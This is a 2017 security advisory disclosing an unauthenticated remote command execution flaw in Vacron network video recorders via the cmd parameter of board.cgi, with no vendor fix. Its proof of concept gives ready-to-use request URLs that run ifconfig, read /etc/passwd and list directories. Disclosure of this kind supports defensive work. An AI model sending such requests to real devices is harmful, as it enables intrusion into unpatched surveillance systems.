SSD Advisory – Vacron NVR Remote Command Execution

October 8, 2017 admin Remote Command Execution, SecuriTeam Secure Disclosure, Unauthenticated Action

Credit to Author: SSD / Maor Schwartz| Date: Sun, 08 Oct 2017 06:49:20 +0000

Want to get paid for a vulnerability similar to this one?
Contact us at: sxsxdx@xbxexyxoxnxdxsxexcxuxrxixtxy.xcom

Vulnerability Summary
The following advisory describes a remote command execution vulnerability.

VACRON Specializing in “various types of mobile monitoring, CCTV monitoring system, IP remote image monitoring system monitoring and other related production, and can accept ODM, OEM and other customized orders, the main products: driving recorder, CCTV analog monitoring system, CMS, IP Cam, etc.”

Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.

Vendor response
We tried to contact Vacron since September 5 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for the vulnerability.

Vulnerability details
User controlled input is not sufficiently sanitized when passed to board.cgi.

board.cgi receives a parameter as input. When we pass cmd as a parameter input, we will execute arbitrary commands.

Proof of Concept

 http://IP/board.cgi?cmd=ifconfig  http://IP/board.cgi?cmd=cat+/etc/passwd  http:/IP/board.cgi?cmd=ls+../../../

https://blogs.securiteam.com/index.php/feed